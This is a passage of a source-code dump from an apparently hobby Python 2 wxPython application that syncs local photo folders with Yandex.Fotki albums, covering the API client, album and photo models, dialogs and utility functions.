self.convert_time(self.data.get('published'))\n\n def update(self):\n self.data = self.service.request(self.link_self)\n\n def edit(self, upd_data):\n data = self.service.request(self.link_edit)\n data.update(upd_data)\n data = json.dumps(data)\n headers = {'Content-Type': 'application/json; type=entry'}\n self.data = self.service.request(self.link_self, data, headers, method='PUT')\n\n def delete(self):\n self.service.request(self.link_self, code=204, method='DELETE')\n\n # def __str__(self):\n # return pprint.pformat(self.data)\n\n def __eq__(self, other):\n return self.id == other.id\n\n\nclass YandexAlbum(YandexEntry):\n @property\n def link_photos(self):\n return self.link('photos')\n\n @property\n def photos(self):\n return list(self.iter_photos())\n\n @property\n def count(self):\n return self.data.get('imageCount', 0)\n\n def upload(self, filename):\n # При загрузке данных надо обернуть все в bytearray, иначе происходит ошибка Unicode\n # чертовы строки в python\n # http://bugs.python.org/issue12398\n data = bytearray(open(filename, 'rb').read())\n mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n headers = {'Content-Type': mimetype}\n answer = self.service.request(self.link_photos, data, headers, code=201)\n photo = YandexPhoto(self.service, answer)\n return 
photo\n\n def edit(self, title=None, summary=None, parent=None):\n data = {}\n if title is not None:\n data['title'] = title\n if summary is not None:\n data['summary'] = summary\n if parent is not None:\n data['links'] = {'album': parent.get_link()}\n YandexEntry.edit(self, data)\n\n def iter_photos(self, count=None, rlimit=100):\n return self.service.iter_entries(self.link_photos, YandexPhoto, count, rlimit)\n\n def create_album(self, title, summary=None):\n return self.service.create_album(title, summary, self)\n\n\nclass YandexPhoto(YandexEntry):\n def __init__(self, service, data):\n YandexEntry.__init__(self, service, data)\n imgs = self.data['img']\n self.images = sorted([YandexImage(self, name, imgs[name]) for name in imgs],\n key=lambda x: x.w)\n\n def image(self, name):\n return next((x for x in self.images if x.name == name), None)\n\n def edit(self, title=None, summary=None, xxx=None,\n disable_comments=None, hide_original=None, access=None):\n data = {}\n if title is not None:\n data['title'] = title\n if summary is not None:\n data['summary'] = summary\n if xxx is not None:\n data['xxx'] = bool(xxx)\n if disable_comments is not None:\n data['disableComments'] = bool(disable_comments)\n if hide_original is not None:\n data['hideOriginal'] = bool(hide_original)\n if access is not None:\n data['access'] = access\n YandexEntry.edit(self, data)\n\n @property\n def tags(self):\n return self.data.get('tags', {})\n\n\nclass YandexImage(object):\n def __init__(self, photo, name, data):\n self.photo = photo\n self.name = name\n self.w = data['width']\n self.h = data['height']\n self.size = data.get('bytesize')\n self.href = data['href']\n\n def download(self):\n return urllib2.urlopen(self.href).read()\n\n def __repr__(self):\n return '<{} {}x{}>'.format(self.name, self.w, self.h)\n\n\nclass YandexTag(object):\n def __init__(self, data):\n self.data = data\n\n def __str__(self):\n return pprint.pformat(self.data)\n\n\nif __name__ == '__main__':\n try:\n s = YandexService(None)\n s.load()\n print 'Token', s.token\n ph = next(s.iter_photos())\n pprint.pprint(ph.data)\n # for t in s.iter_tags():\n # print t\n\n except urllib2.HTTPError as ex:\n print ex\n"
},
{
"alpha_fraction": 0.5976352691650391,
"alphanum_fraction": 0.6076675057411194,
"avg_line_length": 36.76388931274414,
"blob_id": "471cdabac4614802e4b04368e21af8700c203392",
"content_id": "75c704a7555a10a8c83287431806da4f4c52f828",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2864,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 72,
"path": "/lib/forms/syncfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass SyncSettingsDialog(wx.Dialog):\r\n def __init__(self, alb, parent=None):\r\n wx.Dialog.__init__(self, parent, title=u'Настройки альбома')\r\n\r\n self.album = alb\r\n \"\"\"@type : PhotoAlbum\"\"\"\r\n\r\n self.sync_checkbox = wx.CheckBox(self, wx.NewId(), u'Включить синхронизацию')\r\n self.sync_checkbox.SetValue(bool(self.album.sync))\r\n self.folder_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.folder or ''))\r\n self.folder_btn = wx.Button(self, wx.NewId(), u'...', size=(25, -1))\r\n self.pattern_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.pattern or ''))\r\n self.deep_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.deep or 1))\r\n\r\n folder_sizer = wx.BoxSizer()\r\n folder_sizer.Add(self.folder_input, 1, wx.EXPAND | wx.ALL)\r\n folder_sizer.Add(self.folder_btn, 0, wx.LEFT, 5)\r\n\r\n input_sizer = wx.FlexGridSizer(4, 2, 5, 10)\r\n input_sizer.AddGrowableCol(1)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Директория'))\r\n input_sizer.AddSizer(folder_sizer, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Шаблон'))\r\n input_sizer.Add(self.pattern_input, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Глубина синхронизации'))\r\n input_sizer.Add(self.deep_input, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.AddStretchSpacer()\r\n input_sizer.Add(self.sync_checkbox, 1, wx.EXPAND | wx.ALL)\r\n\r\n btn_sizer = self.CreateStdDialogButtonSizer(wx.OK | wx.CANCEL)\r\n\r\n main_sizer = wx.BoxSizer(wx.VERTICAL)\r\n main_sizer.AddSizer(input_sizer, 1, wx.EXPAND | wx.ALL, 15)\r\n main_sizer.AddSizer(btn_sizer, 0, wx.EXPAND | wx.ALL | wx.TOP, 15)\r\n\r\n self.SetSizer(main_sizer)\r\n self.Fit()\r\n self.SetSize((520, -1))\r\n\r\n self.folder_btn.Bind(wx.EVT_BUTTON, self.OnSelectFolder)\r\n\r\n def GetFolder(self):\r\n return self.folder_input.GetValue()\r\n\r\n def GetPattern(self):\r\n return self.pattern_input.GetValue()\r\n\r\n def GetDeep(self):\r\n return self.deep_input.GetValue()\r\n\r\n def IsSync(self):\r\n return self.sync_checkbox.GetValue()\r\n\r\n def OnSelectFolder(self, event):\r\n dir_dlg = wx.DirDialog(self)\r\n if dir_dlg.ShowModal() == wx.ID_OK:\r\n self.folder_input.SetValue(dir_dlg.GetPath())\r\n\r\n def Run(self):\r\n if self.ShowModal() == wx.ID_OK:\r\n self.album.sync = self.sync_checkbox.GetValue()\r\n self.album.folder = self.folder_input.GetValue()\r\n self.album.pattern = self.pattern_input.GetValue()\r\n self.album.deep = int(self.deep_input.GetValue())\r\n"
},
{
"alpha_fraction": 0.5687164068222046,
"alphanum_fraction": 0.5715641975402832,
"avg_line_length": 32.22743606567383,
"blob_id": "f6a0edc2485e529e82b12ab9d23027d0f2010895",
"content_id": "391b127071d888d666fa2a4db981c22f6a199b76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9946,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 277,
"path": "/lib/models/album.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport yafotki\r\nimport photo\r\nfrom lib.extra import utils\r\n\r\n\r\nclass AlbumError(Exception):\r\n pass\r\n\r\n\r\nclass Album(object):\r\n def __init__(self):\r\n self.parent = None\r\n self.children = []\r\n\r\n @property\r\n def id(self):\r\n return None\r\n\r\n @property\r\n def count(self):\r\n return None\r\n\r\n @property\r\n def link_self(self):\r\n return None\r\n\r\n def is_web(self):\r\n return True\r\n\r\n def append_child(self, album):\r\n album.parent = self\r\n self.children.append(album)\r\n\r\n\r\nclass ServiceAlbum(Album):\r\n def __init__(self, yandex_service, settings):\r\n \"\"\"\r\n @type yandex_service: yafotki.YandexService\r\n \"\"\"\r\n Album.__init__(self)\r\n self.service = yandex_service\r\n self.settings = settings\r\n self._build_album_tree(self.service.albums, settings, self, 0, '')\r\n\r\n @property\r\n def title(self):\r\n return u'Все фотографии'\r\n\r\n @property\r\n def link_self(self):\r\n return self.service.link_self\r\n\r\n def get_photos(self, progress):\r\n map_f = lambda x: photo.MatchedPhoto(remote=x)\r\n msg_f = lambda index, item: u'Фотография: {}'.format(item.title)\r\n return list(progress.map(map_f, self.service.iter_photos(100), title=u'Загружаем фотографии', message=msg_f))\r\n\r\n def create_album(self, title, summary=None):\r\n new_yandex_album = self.service.create_album(title, summary)\r\n new_photo_album = PhotoAlbum(new_yandex_album)\r\n self.append_child(new_photo_album)\r\n return new_photo_album\r\n\r\n @staticmethod\r\n def _build_album_tree(yaalbums, settings, current, level, pattern):\r\n \"\"\"\r\n Построить дерево альбомов на основе альбомов на сервисе с учетом альбомов,\r\n которые необходимо синхронизировать.\r\n Это очень важная функция! 
Она синхронизирует иерархию альбомов.\r\n @type yaalbums: list of YandexAlbum\r\n @type settings: dict\r\n @type current: ServiceAlbum|PhotoAlbum\r\n @type level: int\r\n @type pattern: basestring\r\n \"\"\"\r\n f = lambda i: i.link_parent == current.link_self if current.is_web() else False\r\n web_albums = [PhotoAlbum(i, settings.get(i.id, {})) for i in yaalbums if f(i)]\r\n local_albums = []\r\n\r\n if isinstance(current, PhotoAlbum):\r\n # если есть собственные настройки синхронизации\r\n if current.sync:\r\n level = current.deep\r\n pattern = current.pattern\r\n # да, синхронизоровать надо\r\n if current.folder and pattern and level > 0:\r\n for folder_name in os.listdir(current.folder):\r\n folder_path = os.path.join(current.folder, folder_name)\r\n if not os.path.isdir(folder_path):\r\n continue\r\n if not utils.check_files(folder_path, pattern):\r\n continue\r\n try:\r\n web_album = next((i for i in web_albums if i.title == folder_name))\r\n web_album.folder = folder_path\r\n web_album.pattern = pattern\r\n except StopIteration:\r\n local_album = PhotoAlbum(None)\r\n local_album.folder = folder_path\r\n local_album.pattern = pattern\r\n local_albums.append(local_album)\r\n\r\n for album in web_albums + local_albums:\r\n new_level = level - 1 if level > 0 else 0\r\n ServiceAlbum._build_album_tree(yaalbums, settings, album, new_level, pattern)\r\n current.append_child(album)\r\n\r\n\r\nclass PhotoAlbum(Album):\r\n\r\n def __init__(self, yaalbum, settings=None):\r\n \"\"\"\r\n @type album: yafotki.YandexAlbum|None\r\n @type settings: dict|None\r\n \"\"\"\r\n Album.__init__(self)\r\n self.yaalbum = yaalbum\r\n \"\"\"@type : yafotki.YandexAlbum|None\"\"\"\r\n # settings\r\n self.folder = None\r\n self.sync = False\r\n self.pattern = None\r\n self.deep = 0\r\n # apply settings\r\n if settings:\r\n self.set_settings(settings)\r\n self.remote_photos = None\r\n self.local_photos = None\r\n\r\n def is_web(self):\r\n return bool(self.yaalbum)\r\n\r\n def is_local(self):\r\n return bool(self.folder)\r\n\r\n def is_matched(self):\r\n return self.is_web() and self.is_local()\r\n\r\n def is_synced(self):\r\n return self.sync\r\n\r\n def is_edited(self):\r\n if not self.is_matched():\r\n return False\r\n remote_mtime = self.yaalbum.published\r\n local_mtime = utils.get_mtime(self.folder, self.pattern)\r\n return local_mtime > remote_mtime\r\n\r\n @property\r\n def id(self):\r\n return self.yaalbum.id if self.yaalbum else self.folder\r\n\r\n @property\r\n def title(self):\r\n if self.yaalbum:\r\n return self.yaalbum.title\r\n if self.folder:\r\n return os.path.split(self.folder)[1]\r\n return ''\r\n\r\n @property\r\n def link_self(self):\r\n return self.yaalbum.link_self\r\n\r\n def count_local(self):\r\n if self.folder and self.pattern:\r\n return utils.count_files(self.folder, self.pattern)\r\n return 0\r\n\r\n def count_remote(self):\r\n return self.yaalbum.count if self.yaalbum else 0\r\n\r\n def set_settings(self, settings):\r\n self.sync = settings.get('sync', False)\r\n self.folder = settings.get('folder')\r\n self.pattern = settings.get('pattern')\r\n self.deep = settings.get('deep', 0)\r\n\r\n def get_settings(self):\r\n return {\r\n 'sync': self.sync,\r\n 'folder': self.folder,\r\n 'pattern': self.pattern,\r\n 'deep': self.deep,\r\n }\r\n\r\n def refresh(self, progress):\r\n f = lambda: [photo.MatchedPhoto(remote=yaphoto) for yaphoto in self.yaalbum.photos] if self.yaalbum else []\r\n web_photos = progress.do(f, title=u'Загрузка альбома')\r\n\r\n local_paths = []\r\n if self.folder and 
self.pattern:\r\n local_paths = list(utils.find_files(self.folder, self.pattern))\r\n\r\n map_f = lambda x: photo.MatchedPhoto(local=x)\r\n msg_f = lambda index, item: u'Файл: {}'.format(item)\r\n local_photos = list(progress.map(map_f, local_paths, title=u'Загружаем файлы', message=msg_f))\r\n\r\n if web_photos and local_photos:\r\n non_sync = []\r\n msg_f = lambda index, item: u'Файл: {}'.format(item.title)\r\n for local_photo in progress.wrap(local_photos, title=u'Ищем соответствия', message=msg_f):\r\n f = lambda web_photo: web_photo.similar_to(local_photo)\r\n most_proper = min(web_photos, key=f)\r\n if most_proper.similar_to(local_photo) <= 10.0:\r\n most_proper.assign_local(local_photo)\r\n else:\r\n non_sync.append(local_photo)\r\n local_photos = non_sync\r\n\r\n self.local_photos = local_photos\r\n self.remote_photos = web_photos\r\n\r\n def get_remote_photos(self, progress):\r\n if self.remote_photos is None:\r\n self.refresh(progress)\r\n return self.remote_photos\r\n\r\n def get_local_photos(self, progress):\r\n if self.local_photos is None:\r\n self.refresh(progress)\r\n return self.local_photos\r\n\r\n def get_photos(self, progress):\r\n return self.get_remote_photos(progress) + self.get_local_photos(progress)\r\n\r\n def create_album(self, title, summary=None):\r\n \"\"\"@rtype : PhotoAlbum\"\"\"\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n if self.yaalbum.count:\r\n raise AlbumError(u'Нельзя создать альбом в непустом альбоме')\r\n new_yandex_album = self.yaalbum.create_album(title, summary)\r\n new_photo_album = PhotoAlbum(new_yandex_album)\r\n self.append_child(new_photo_album)\r\n return new_photo_album\r\n\r\n def delete(self, progress):\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n self.yaalbum.delete()\r\n self.yaalbum = None\r\n self.refresh(progress)\r\n\r\n def upload(self, matched_photo):\r\n \"\"\"\r\n Загружает фотографию в альбом. Фотография должна быть локальной\r\n @type photo: photo.MatchedPhoto\r\n @raise AlbumError\r\n \"\"\"\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n if not matched_photo.is_local(strict=True):\r\n raise AlbumError(u'Это не локальный файл')\r\n path = matched_photo.data.get_path()\r\n yaphoto = self.yaalbum.upload(path)\r\n yaphoto.edit(access='public')\r\n print 'published', yaphoto.published\r\n print 'edited ', yaphoto.edited\r\n # matched_photo.web = yaphoto\r\n\r\n def synchronize(self, progress):\r\n if not self.is_matched() and self.parent:\r\n new_album = self.parent.create_album(self.title)\r\n self.yaalbum = new_album.yaalbum\r\n self.refresh(progress)\r\n local_photos = self.get_local_photos(progress)\r\n msg_f = lambda i, x: u'{} ({} MB)'.format(x.title, round(x.size / 1024.0 / 1024.0))\r\n for ph in progress.wrap(local_photos, title=u'Загружаем фотографии', message=msg_f):\r\n self.upload(ph)\r\n self.refresh(progress)\r\n"
},
{
"alpha_fraction": 0.6228593587875366,
"alphanum_fraction": 0.6272703409194946,
"avg_line_length": 28.646154403686523,
"blob_id": "61703d5efcbcdfddfbe328be87eb10c011682c29",
"content_id": "965ff2164e284fb35190b41d9fac89b824833939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9625,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 260,
"path": "/lib/extra/utils.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\n#! coding: utf-8\n\nimport os\nimport json\nimport urllib2\nimport wx\nimport re\nimport itertools\nimport cProfile\nimport pstats\nimport StringIO\nimport datetime\n\n\ndef load_file(filename, default=None):\n data = default or {}\n if os.path.exists(filename):\n with open(filename, 'r') as f:\n new_settings = json.load(f)\n data.update(new_settings)\n return data\n\n\ndef save_file(filename, data):\n with open(filename, 'w') as f:\n json.dump(data, f, indent=2)\n\n\ndef calc_width(rels, height, border):\n \"\"\"\n Рассчитать общую ширину полосы фотографий при данных высоте\n и границах (справа и слева) рамки\n @param rels: набор отношений ширины к высоты для каждой картинки\n @param height: высота полосы\n @param border: ширина рамки для каждой картинки\n @return: рассчитанная ширина полосы\n \"\"\"\n return sum([height * r + 2 * border for r in rels])\n\n\ndef calc_height(rels, width, border):\n \"\"\"\n Рассчитать оптимальную высоту для полосы фотографий так,\n чтобы все фотографии влезли в полосу, сохранив пропорции\n каждой фотографии.\n\n Использует метод бинарного поиска.\n\n Огромное спасибо Данилову Александру и Бутину Кириллу\n за подсказку алгоритма нахождения оптимальной высоты\n\n @param rels: набор отношений ширины к высоты для каждой картинки\n @param width: ширина полосы\n @param border: ширина рамки для каждой картинки\n @return: оптимальная высота полосы\n \"\"\"\n low = 0.0\n high = 65536.0 # max resolution\n while high - low > 0.1:\n middle = (high + low) / 2\n if calc_width(rels, middle, border) < width:\n low = middle\n else:\n high = middle\n return (high + low) / 2\n\n\ndef calc_frames(rels, stripe_width, stripe_border, stripe_height):\n \"\"\"\n На основе переданных отношений изображений вычисляет оптимальные\n параметры ширины и высоты, чтобы разместить их в полосу.\n \"\"\"\n do_check = True\n\n # вычисляем высоту для полосы\n # у всех изображений высота будет одинаковая\n height = int(round(calc_height(rels, stripe_width, stripe_border)))\n\n # если полученая высота больше максимально допустимой,\n # то ее придется уменьшить (от этого уменьшится и ширина полосы)\n if height >= stripe_height:\n height = stripe_height\n do_check = False\n\n # вычисляем разрешения изображений\n dims = [(int(round(height * r)), height) for r in rels]\n\n # выполняем проверку\n # иногда при расчетах новой ширины для изображений, их суммарная ширина\n # может на несколько точек отличатсья от ширины полосы;\n # поэтому корректируем последнее изображение в полосе,\n # растягивая или сжимая его\n if do_check:\n # контрольная сумма\n check_width = sum([w + 2 * stripe_border for w, h in dims])\n # разница ширины в точках\n delta = stripe_width - check_width\n # получаем размеры последнего изображения\n w, h = dims[-1]\n # изменяем размеры последнего изображения\n dims[-1] = w + delta, h\n\n return dims\n\n\ndef render_template(template, remote_photo, w, h):\n \"\"\"\n Заполнить указанный шаблон. 
Плейсхолдеры в шаблоне имеют следующий формат: {{<размер>:<атрибут>}},\n где размер: число, тогда будет найдено изображение не меньше квадрата с такой сороной\n * - будет найдено изображение, подходящее под параметры w, h, которые в свою очередь подобраны\n алгоритмом по выстраиванию изображений calc_frames\n атрибут: один из атрибутов YandexImage w, h, href\n @type template: string|unicode\n @type remote_photo: photo.RemotePhoto\n @param w:\n @param h:\n @return:\n \"\"\"\n def repl(match):\n name, attr = match.group(1).split(':')[:2]\n adjusment = name == '*'\n if adjusment:\n img = remote_photo.nearest(w, h)\n else:\n size = int(name)\n img = remote_photo.nearest(size, size)\n if attr == 'w':\n return str(w if adjusment else img.w)\n if attr == 'h':\n return str(h if adjusment else img.h)\n if attr == 'href':\n return str(img.href)\n\n return re.sub('{{(.*?)}}', repl, template, re.UNICODE)\n\n\ndef text_to_clipboard(text):\n \"\"\"\n Помещает переданный текст в буфер обмена\n @param text: текст\n @return: удалось или нет\n \"\"\"\n do = wx.TextDataObject()\n do.SetText(text)\n result = wx.TheClipboard.Open()\n if result:\n wx.TheClipboard.SetData(do)\n wx.TheClipboard.Close()\n return result\n\n\ndef fit(imgW, imgH, frameW, frameH):\n \"\"\"\n Уместить прямоугольник со сторонами imgW и imgH\n в прямоугольник со сторонами frameW, frameH, сохраняя пропорции\n исходного прямоугольника.\n @param imgW: ширина прямоугольника\n @param imgH: высота прямоугольника\n @param frameW: ширина рамки\n @param frameH: высота рамки\n @return: размер вписанного прямоугольника\n \"\"\"\n if imgW == 0 and imgH == 0:\n return 0, 0\n scale = min(1.0, float(frameW) / imgW, float(frameH) / imgH)\n return imgW * scale, imgH * scale\n\n\ndef resize(wximage, w, h, quality=wx.IMAGE_QUALITY_HIGH):\n \"\"\"\n Изменить размер изображения таким образом, чтобы оно вписывалось\n в жанный прямоугльник со сторонами w, h\n @param wximage: изображение\n @param w: ширина прямоугольника\n @param h: высота прямоугольника\n @param quality: качество конвертации\n @return: измененное изображение\n \"\"\"\n img_w = wximage.GetWidth()\n img_h = wximage.GetHeight()\n new_w, new_h = fit(img_w, img_h, w, h)\n return wximage.Rescale(new_w, new_h, quality)\n\n\ndef find_files(path, pattern):\n regex = re.compile(pattern, re.IGNORECASE | re.UNICODE)\n for dirpath, dirnames, filenames in os.walk(path):\n for f in filenames:\n if re.match(regex, f):\n yield os.path.join(dirpath, f)\n\n\ndef get_mtime(path, pattern):\n regex = re.compile(pattern, re.IGNORECASE | re.UNICODE)\n mtime = os.stat(path).st_mtime\n for dirpath, dirnames, filenames in os.walk(path):\n has_files = any((re.match(regex, f) for f in filenames))\n if has_files:\n mtime = max(mtime, os.stat(dirpath).st_mtime)\n return datetime.datetime.fromtimestamp(mtime)\n\n\ndef check_files(path, pattern):\n return bool(list(itertools.islice(find_files(path, pattern), 1)))\n\n\ndef count_files(path, pattern):\n return sum(1 for i in find_files(path, pattern))\n\n\ndef http_handler(f):\n def wrapper(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except urllib2.HTTPError as err:\n msg = str(err)\n if err.code == 403:\n msg += u'\\nНе удается войти в систему. 
Проверьте правильность имени пользователя и пароля.'\n wx.MessageBox(msg, u'Ошибка', style=wx.ICON_ERROR)\n return wrapper\n\n\ndef long_time(f):\n def wrapper(*args, **kwargs):\n wx.BeginBusyCursor()\n try:\n return f(*args, **kwargs)\n finally:\n wx.EndBusyCursor()\n return wrapper\n\n\ndef profile(f):\n def wrapper(*args, **kwargs):\n pr = cProfile.Profile()\n pr.enable()\n # начало функции\n result = f(*args, **kwargs)\n # конец функции\n pr.disable()\n s = StringIO.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print s.getvalue()\n return result\n return wrapper\n\n#-------------------------------------------------------------------------------\n\n\ndef main():\n import itertools\n print list(itertools.islice(find_files(u'M:\\\\', '.+_lg\\.jpg'), 1))\n # for f in :\n # print f\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5795257091522217,
"alphanum_fraction": 0.5991902947425842,
"avg_line_length": 34.02083206176758,
"blob_id": "31c2990bc8d8caaa74f5821a2447e4e3ad569483",
"content_id": "2109f10cfeb4490fb5ca275396d1366f27843e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 48,
"path": "/lib/forms/authfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass AuthDialog(wx.Dialog):\r\n \"\"\"\r\n Пыш 123\r\n \"\"\"\r\n def __init__(self, parent, username, password):\r\n wx.Dialog.__init__(self, parent, title='Authorization', size=(300, 145))\r\n\r\n self.username = username\r\n self.password = password\r\n\r\n sb = wx.StaticBitmap(self)\r\n sb.SetBitmap(wx.Bitmap('share/service_auth.png'))\r\n self.textLogin = wx.TextCtrl(self, value=self.username)\r\n self.textPass = wx.TextCtrl(self, style=wx.TE_PASSWORD, value=self.password)\r\n btnOk = wx.Button(self, wx.ID_OK)\r\n buttons = wx.StdDialogButtonSizer()\r\n buttons.AddButton(btnOk)\r\n buttons.AddButton(wx.Button(self, wx.ID_CANCEL))\r\n buttons.Realize()\r\n\r\n main_sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer1 = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer1.Add(sb, 0, wx.ALL, 5)\r\n input_sizer = wx.FlexGridSizer(2, 2, 12, 12)\r\n input_sizer.AddGrowableCol(1)\r\n input_sizer.Add(wx.StaticText(self, label='Login:'))\r\n input_sizer.Add(self.textLogin, 0, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, label='Password:'))\r\n input_sizer.Add(self.textPass, 0, wx.EXPAND | wx.ALL)\r\n sizer1.Add(input_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)\r\n main_sizer.Add(sizer1, 0, wx.EXPAND | wx.ALL, 10)\r\n main_sizer.Add(buttons, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 20)\r\n\r\n self.SetSizer(main_sizer)\r\n self.Bind(wx.EVT_BUTTON, self.OnOK, btnOk)\r\n\r\n def OnOK(self, event):\r\n self.username = self.textLogin.GetValue()\r\n self.password = self.textPass.GetValue()\r\n self.EndModal(wx.ID_OK)\r\n"
},
{
"alpha_fraction": 0.42907801270484924,
"alphanum_fraction": 0.43026003241539,
"avg_line_length": 28.285715103149414,
"blob_id": "3e8247eb024a0253c24f71eb4c4f4a9a389ea776",
"content_id": "aa226843df1bc67a34288f737b3c119c848cc188",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 996,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/phoebe.pyw",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n#todo Просмотр фотографии\r\n#todo Просмотр всего альбома\r\n#todo Настройка опций загрузки альбома\r\n#todo Настройка опций конвертации фотографий при загрузке\r\n#todo Обновление списка фотографий по команде!!!\r\n\r\nimport wx\r\nfrom lib.controllers import overviewctr\r\n\r\n#-----------------------------------------------------------------------------\r\n# Application\r\n#-----------------------------------------------------------------------------\r\n\r\nclass ThisApp(wx.App):\r\n def OnInit(self):\r\n overviewctr.OverviewController(self)\r\n return True\r\n\r\n#-----------------------------------------------------------------------------\r\n# Main cicle\r\n#-----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n app = ThisApp(redirect=False)\r\n app.MainLoop()"
},
{
"alpha_fraction": 0.5668807029724121,
"alphanum_fraction": 0.5683836340904236,
"avg_line_length": 27.995901107788086,
"blob_id": "7313896636c94e78829ada09da3cd4d8e8baba5e",
"content_id": "c6af0ff721e4f7c0e01f2b0ec14b2cb5d9af28a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7368,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 244,
"path": "/lib/models/photo.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport wx\r\nimport abc\r\nimport StringIO\r\nimport datetime\r\nimport imghash\r\nimport cachedb\r\nfrom lib.extra import utils\r\n\r\n\r\nclass PhotoError(Exception):\r\n pass\r\n\r\n\r\nclass BasePhoto(object):\r\n __metaclass__ = abc.ABCMeta\r\n\r\n @staticmethod\r\n def _load_cache(sid, remote, mtime):\r\n now = datetime.datetime.now()\r\n try:\r\n cache = cachedb.Photo.get(cachedb.Photo.sid == sid, cachedb.Photo.remote == remote)\r\n if mtime > cache.modified:\r\n cache.delete_instance()\r\n cache = cachedb.Photo.create(sid=sid, remote=remote, viewed=now, modified=mtime)\r\n else:\r\n cache.viewed = now\r\n cache.save()\r\n except cachedb.Photo.DoesNotExist:\r\n cache = cachedb.Photo.create(sid=sid, remote=remote, viewed=now, modified=mtime)\r\n return cache\r\n\r\n def __init__(self):\r\n self._hash = None\r\n self._cache = None\r\n self._title = ''\r\n self._ratio = None\r\n\r\n @abc.abstractmethod\r\n def _get_img_hash(self):\r\n return None\r\n\r\n def get_title(self):\r\n return self._title\r\n\r\n def get_ratio(self):\r\n return self._ratio\r\n\r\n def get_hash(self):\r\n if self._hash is not None:\r\n return self._hash\r\n hash_values = [i.value for i in self._cache.hash_values.order_by(cachedb.HashValue.sort)]\r\n if hash_values:\r\n self._hash = imghash.ImageHash(hash_values)\r\n else:\r\n self.update_hash(self._get_img_hash())\r\n assert self._hash is not None\r\n return self._hash\r\n\r\n def update_hash(self, img_hash):\r\n rows = ({'photo': self._cache, 'sort': idx, 'value': value} for idx, value in enumerate(img_hash.values))\r\n with cachedb.transaction():\r\n cachedb.HashValue.delete().where(cachedb.HashValue.photo == self._cache).execute()\r\n cachedb.HashValue.insert_many(rows).execute()\r\n self._hash = img_hash\r\n\r\n\r\nclass RemotePhoto(BasePhoto):\r\n def __init__(self, yaphoto):\r\n \"\"\"\r\n @type yaphoto: yafotki.YandexPhoto\r\n \"\"\"\r\n BasePhoto.__init__(self)\r\n self._yaphoto = yaphoto\r\n self._title = self._yaphoto.title\r\n last_img = yaphoto.images[-1]\r\n self._ratio = float(last_img.w) / float(last_img.h)\r\n self._mtime = self._yaphoto.edited\r\n self._ctime = self._yaphoto.published\r\n self._cache = self._load_cache(sid=yaphoto.id, remote=True, mtime=self._mtime)\r\n\r\n def _get_img_hash(self):\r\n data = self._get_data(800, 800)\r\n return imghash.ImageHash.from_stream(data)\r\n\r\n def _get_data(self, w, h):\r\n img = self.nearest(w, h)\r\n now = datetime.datetime.now()\r\n try:\r\n img_data = cachedb.Image.get(cachedb.Image.link == img.href)\r\n data = img_data.data\r\n img_data.viewed = now\r\n img_data.save()\r\n except cachedb.Image.DoesNotExist:\r\n data = img.download()\r\n cachedb.Image.create(photo=self._cache, link=img.href, data=data, viewed=now)\r\n if img.w > self._cache.width or img.h > self._cache.height:\r\n self._cache.width = img.w\r\n self._cache.height = img.h\r\n if img.h:\r\n self._cache.ratio = float(img.w) / float(img.h)\r\n self._cache.save()\r\n if self._hash:\r\n self.update_hash(imghash.ImageHash.from_stream(data))\r\n return data\r\n\r\n def get_id(self):\r\n return self._yaphoto.id\r\n\r\n def get_size(self):\r\n last_img = 